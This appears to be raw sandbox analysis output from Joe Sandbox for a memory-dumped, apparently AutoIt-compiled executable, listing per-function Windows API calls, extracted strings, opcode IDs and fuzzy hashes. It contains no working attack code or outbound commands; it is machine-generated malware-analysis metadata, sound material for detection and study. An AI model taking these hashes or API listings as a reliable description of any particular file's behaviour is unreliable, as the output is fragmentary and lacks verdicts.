                                        • Instruction ID: fe26c9468bd7c62ae81d921ce32648976a2b8d94407e5c79b0e005ae12b6dd1e
                                        • Opcode Fuzzy Hash: 3645c948912b53f2843f29f49171c18663351b4f8f76b4b42e7824a66fc54498
                                        • Instruction Fuzzy Hash: 5FE0E23420420CEFCB01EF88D848E963BA5FB5A350F004054FD048B261C771A830EB61
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 007DF3D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: f8c723e58f5a03e78776a59cd7d78fb317fd20526da7c9be13b8d7acf97a6626
                                        • Instruction ID: 01e0ededcbe42297f8597a000b9a6806a9fcdafb7eeec38c0e8d9623e6e00358
                                        • Opcode Fuzzy Hash: f8c723e58f5a03e78776a59cd7d78fb317fd20526da7c9be13b8d7acf97a6626
                                        • Instruction Fuzzy Hash: 27E0173420020CEFCB01EF88D848E963BA5FB5A350F004054FD048B362C772E830EBA1
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0078B85B), ref: 0078B926
                                          • Part of subcall function 0078B86E: KillTimer.USER32(00000000,?,?,?,?,0078B85B,00000000,?,?,0078AF1E,?,?), ref: 0078B9BD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0078AF1E,?,?), ref: 0078B864
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        • Opcode ID: dacf5353136c87d7c5d570d157f1b1f3bb9c6cfd702bb3dbc54f7757796b49e2
                                        • Instruction ID: 096a2a89df0b9e36c1f95a702410274c1c46b017feebc7e76018802b144fe78e
                                        • Opcode Fuzzy Hash: dacf5353136c87d7c5d570d157f1b1f3bb9c6cfd702bb3dbc54f7757796b49e2
                                        • Instruction Fuzzy Hash: FCD0127118430CF7DF103BA1DC0FF597A1EEB45B50F408431F7056A1E18A75A820A699
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00798E1F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: ae25e6b456fd9e58c0fda83d47ed9ecd72fd8989f87d83b36e7a0a9d15b32938
                                        • Instruction ID: 67804a9dd2403e5228be8ab2633f3067b1b6773e0a3e20409303651985127338
                                        • Opcode Fuzzy Hash: ae25e6b456fd9e58c0fda83d47ed9ecd72fd8989f87d83b36e7a0a9d15b32938
                                        • Instruction Fuzzy Hash: 4AA0123000450CE78B001B51EC044587F5DDA051507008010F50C00021873358108585
                                        APIs
                                        • GetProcessHeap.KERNEL32(00796AE9,008267D8,00000014), ref: 0079A937
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 45853190535495e5235a169b0bd4244f9411baabdbcfce89b2b60ce8d34e0c2d
                                        • Instruction ID: a2e9144dc2e1622e79e5cc832c171e6b6c69d84d12a8535bb10ded8d53494918
                                        • Opcode Fuzzy Hash: 45853190535495e5235a169b0bd4244f9411baabdbcfce89b2b60ce8d34e0c2d
                                        • Instruction Fuzzy Hash: 11B012B0303102CBDB084B38AC6422E3FD56789101302807D7403C2960DB30C810DF00
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction ID: afd082c0dec34f025276631ece7d3799c732ded6a435a5ce18e5ea07949a883f
                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction Fuzzy Hash: ABC1C5722151934DDF2D863EE43443EFBA19AA27B131A476DD8B3CB4C4EE28C974D690
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction ID: 03cef61bb4a976f1106819f767e77c9b3c7b79985560e6b0fb59b90b5744baf5
                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction Fuzzy Hash: 87C109722051934EDF2D8639D43443EBAA19AA27B131B476DD8B3CB5D0EE28C974D6A0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 4da7392876995641748873d795d22decd332392b1ba5ab8aca207dfc352b9745
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: A2C1F7722251934DDF2D8639D43443EFBA19EA27B530A476DD8B3CB0C0EE28C964D6E0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: fe64bfc272d13a6a9538bab42335cbeecf4a2c2d8ca4efacf8de2d85b11b6746
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: BCC1F5722151934DDF2D8639E43443EFBA19EA27B130A476DD8B3CB4C1EE28D964D6E0
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 007CA7A5
                                        • DeleteObject.GDI32(00000000), ref: 007CA7B7
                                        • DestroyWindow.USER32 ref: 007CA7C5
                                        • GetDesktopWindow.USER32 ref: 007CA7DF
                                        • GetWindowRect.USER32(00000000), ref: 007CA7E6
                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007CA927
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007CA937
                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA97F
                                        • GetClientRect.USER32(00000000,?), ref: 007CA98B
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007CA9C5
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA9E7
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CA9FA
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA05
                                        • GlobalLock.KERNEL32(00000000), ref: 007CAA0E
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA1D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007CAA26
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAA2D
                                        • GlobalFree.KERNEL32(00000000), ref: 007CAA38
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007CAA4A
                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007FD9BC,00000000), ref: 007CAA60
                                        • GlobalFree.KERNEL32(00000000), ref: 007CAA70
                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007CAA96
                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007CAAB5
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CAAD7
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007CACC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 1e74a9d7daf97a96476b32033cf2bed5144500fc7df29b8622ca73d9061d6ab3
                                        • Instruction ID: f7b243b0554a60216f1ef94265fe6d3e8982a75962cdabb0374fdfeae1e27e04
                                        • Opcode Fuzzy Hash: 1e74a9d7daf97a96476b32033cf2bed5144500fc7df29b8622ca73d9061d6ab3
                                        • Instruction Fuzzy Hash: 11026D71A00209EFDB24DF64CD89EAE7BB9FB49355F10811CF905AB2A1D7789D41CB60
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 007DD0EB
                                        • GetSysColorBrush.USER32(0000000F), ref: 007DD11C
                                        • GetSysColor.USER32(0000000F), ref: 007DD128
                                        • SetBkColor.GDI32(?,000000FF), ref: 007DD142
                                        • SelectObject.GDI32(?,00000000), ref: 007DD151
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007DD17C
                                        • GetSysColor.USER32(00000010), ref: 007DD184
                                        • CreateSolidBrush.GDI32(00000000), ref: 007DD18B
                                        • FrameRect.USER32(?,?,00000000), ref: 007DD19A
                                        • DeleteObject.GDI32(00000000), ref: 007DD1A1
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 007DD1EC
                                        • FillRect.USER32(?,?,00000000), ref: 007DD21E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DD249
                                          • Part of subcall function 007DD385: GetSysColor.USER32(00000012), ref: 007DD3BE
                                          • Part of subcall function 007DD385: SetTextColor.GDI32(?,?), ref: 007DD3C2
                                          • Part of subcall function 007DD385: GetSysColorBrush.USER32(0000000F), ref: 007DD3D8
                                          • Part of subcall function 007DD385: GetSysColor.USER32(0000000F), ref: 007DD3E3
                                          • Part of subcall function 007DD385: GetSysColor.USER32(00000011), ref: 007DD400
                                          • Part of subcall function 007DD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DD40E
                                          • Part of subcall function 007DD385: SelectObject.GDI32(?,00000000), ref: 007DD41F
                                          • Part of subcall function 007DD385: SetBkColor.GDI32(?,00000000), ref: 007DD428
                                          • Part of subcall function 007DD385: SelectObject.GDI32(?,?), ref: 007DD435
                                          • Part of subcall function 007DD385: InflateRect.USER32(?,000000FF,000000FF), ref: 007DD454
                                          • Part of subcall function 007DD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DD46B
                                          • Part of subcall function 007DD385: GetWindowLongW.USER32(00000000,000000F0), ref: 007DD480
                                          • Part of subcall function 007DD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DD4A8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 3521893082-0
                                        • Opcode ID: 0b6cf4009b6791b38444a4e9fede7b97bc1d07549d80b05c61d712f7fa08c036
                                        • Instruction ID: 4d1fa2499cd72083cb6f34912ee06c51cd9c0d89a2f8ab20f0fb94d604c14138
                                        • Opcode Fuzzy Hash: 0b6cf4009b6791b38444a4e9fede7b97bc1d07549d80b05c61d712f7fa08c036
                                        • Instruction Fuzzy Hash: EC918D72008305AFDB209F64DC48E6BBBBAFF89321F104A19F962961E0D779DD44CB56
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 007CA42A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007CA4E9
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007CA527
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007CA539
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007CA57F
                                        • GetClientRect.USER32(00000000,?), ref: 007CA58B
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007CA5CF
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007CA5DE
                                        • GetStockObject.GDI32(00000011), ref: 007CA5EE
                                        • SelectObject.GDI32(00000000,00000000), ref: 007CA5F2
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007CA602
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CA60B
                                        • DeleteDC.GDI32(00000000), ref: 007CA614
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007CA642
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 007CA659
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007CA694
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007CA6A8
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 007CA6B9
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007CA6E9
                                        • GetStockObject.GDI32(00000011), ref: 007CA6F4
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007CA6FF
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007CA709
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 72aaa67757939ec7e1a4421d63fce08d0580d537496c71ad283e4230e11e7cae
                                        • Instruction ID: fb686557942789db5f19d608111b6d689e64344099703e3576b063f28cf30d80
                                        • Opcode Fuzzy Hash: 72aaa67757939ec7e1a4421d63fce08d0580d537496c71ad283e4230e11e7cae
                                        • Instruction Fuzzy Hash: 09A14E71A40619BFEB24DBA8DC49FAE7BB9EB44754F008118F614AB2D0D6B4AD40CB64
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BE45E
                                        • GetDriveTypeW.KERNEL32(?,0080DC88,?,\\.\,0080DBF0), ref: 007BE54B
                                        • SetErrorMode.KERNEL32(00000000,0080DC88,?,\\.\,0080DBF0), ref: 007BE6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: c75ec2b87af5a266266ab6c9fe8c89d91e40aa2bf4e449d6efc8029b36039c3a
                                        • Instruction ID: a1b833fdb1bd70f3fd5960479d355d0943023cf903756181d608347e1c2e0e29
                                        • Opcode Fuzzy Hash: c75ec2b87af5a266266ab6c9fe8c89d91e40aa2bf4e449d6efc8029b36039c3a
                                        • Instruction Fuzzy Hash: EF510430208301EBC610DF14D8A9BE9B791FFA4758B51891AF456EB391DB7CDE81DB42
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: a96e470ee1426b7b3d862d6e879e4e13c017c0f65f4427a1be88ba819280686f
                                        • Instruction ID: 752649d484bee9e4062aab4a9536e29d64cecd3f024c88b6ef8738ff7123a0f7
                                        • Opcode Fuzzy Hash: a96e470ee1426b7b3d862d6e879e4e13c017c0f65f4427a1be88ba819280686f
                                        • Instruction Fuzzy Hash: 36610B71240351BBDF26BA649C46FBA339CAF19380F044029FD59E72D2EB5CDE42C6A1
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 007DC598
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007DC64E
                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 007DC669
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 007DC925
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: 0
                                        • API String ID: 2326795674-4108050209
                                        • Opcode ID: 83167812e5265ed1a20b1746ac11fed63d37a43b0e84fd550fc56b0bd7422b88
                                        • Instruction ID: 4204b7a091582ca4577c16fd0235d03b0a179eeaf306c9c548150ef32b6f8d46
                                        • Opcode Fuzzy Hash: 83167812e5265ed1a20b1746ac11fed63d37a43b0e84fd550fc56b0bd7422b88
                                        • Instruction Fuzzy Hash: BDF1D371204302AFE7228F24C889BAABBF5FF89754F18462AF585D63A1C778DC44DB51
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,0080DBF0), ref: 007D6245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 3964851224-45149045
                                        • Opcode ID: c8baacea169de2ec44adfbec4ce3ffefcd4ef9d6cbeece4300daea6764583147
                                        • Instruction ID: d44347321f6845e615ac2b0a6a406ed4225b42001b0af6e01e4d0dc1606548ec
                                        • Opcode Fuzzy Hash: c8baacea169de2ec44adfbec4ce3ffefcd4ef9d6cbeece4300daea6764583147
                                        • Instruction Fuzzy Hash: DCC1A434244201DFCB04FF54D455A6E77E6BF99390F04486AF8869B3A6CB38DD4ACB82
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 007DD3BE
                                        • SetTextColor.GDI32(?,?), ref: 007DD3C2
                                        • GetSysColorBrush.USER32(0000000F), ref: 007DD3D8
                                        • GetSysColor.USER32(0000000F), ref: 007DD3E3
                                        • CreateSolidBrush.GDI32(?), ref: 007DD3E8
                                        • GetSysColor.USER32(00000011), ref: 007DD400
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DD40E
                                        • SelectObject.GDI32(?,00000000), ref: 007DD41F
                                        • SetBkColor.GDI32(?,00000000), ref: 007DD428
                                        • SelectObject.GDI32(?,?), ref: 007DD435
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007DD454
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DD46B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007DD480
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DD4A8
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DD4CF
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 007DD4ED
